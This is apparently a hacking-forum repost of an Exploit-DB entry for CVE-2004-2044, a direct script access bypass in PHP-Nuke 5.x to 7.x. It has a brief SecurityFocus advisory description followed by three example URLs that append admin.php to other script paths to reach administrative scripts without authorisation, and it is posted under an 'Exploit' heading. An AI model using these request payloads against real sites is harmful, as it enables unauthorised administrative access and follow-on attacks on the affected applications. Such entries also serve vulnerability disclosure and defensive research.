Exploit PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24166
Проверка EDB
  1. Пройдено
Автор
SQUID
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-2044
Дата публикации
2004-06-01
Код:
source: https://www.securityfocus.com/bid/10447/info

PHP-Nuke is affected by a direct script access security vulnerability. This issue is due to a failure to properly validate the location and name of the file being accessed.

This issue will allow an attacker to gain access to sensitive scripts such as the 'admin.php' script. The attacker may be able to exploit this unauthorized access to carry out attacks against the affected application.

http://www.example.com/admin/case/case.adminfaq.php/admin.php?op=FaqCatGo
http://www.example.com/admin/admin.php/index.php
http://www.example.com/admin/modules/blocks.php/admin.php
 
Источник
www.exploit-db.com

Похожие темы